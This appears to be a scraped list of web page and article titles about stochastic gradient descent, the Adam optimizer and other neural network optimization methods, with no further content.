

Mathematics | Free Full-Text | aSGD: Stochastic Gradient Descent with Adaptive Batch Size for Every Parameter





Applied Sciences | Free Full-Text | On the Relative Impact of Optimizers on Convolutional Neural Networks with Varying Depth and Width for Image Classification

Assessing Generalization of SGD via Disagreement – Machine Learning Blog | ML@CMU | Carnegie Mellon University

Chengcheng Wan, Shan Lu, Michael Maire, Henry Hoffmann · Orthogonalized SGD and Nested Architectures for Anytime Neural Networks · SlidesLive

Gentle Introduction to the Adam Optimization Algorithm for Deep Learning - MachineLearningMastery.com



The phase diagram of SGD learning regimes for two-layer neural networks... | Download Scientific Diagram

Accuracy of each class of stochastic gradient descent (SGD), artificial... | Download Scientific Diagram





Optimization Algorithms in Neural Networks



An Introduction To Gradient Descent and Backpropagation In Machine Learning Algorithms | by Richmond Alake | Towards Data Science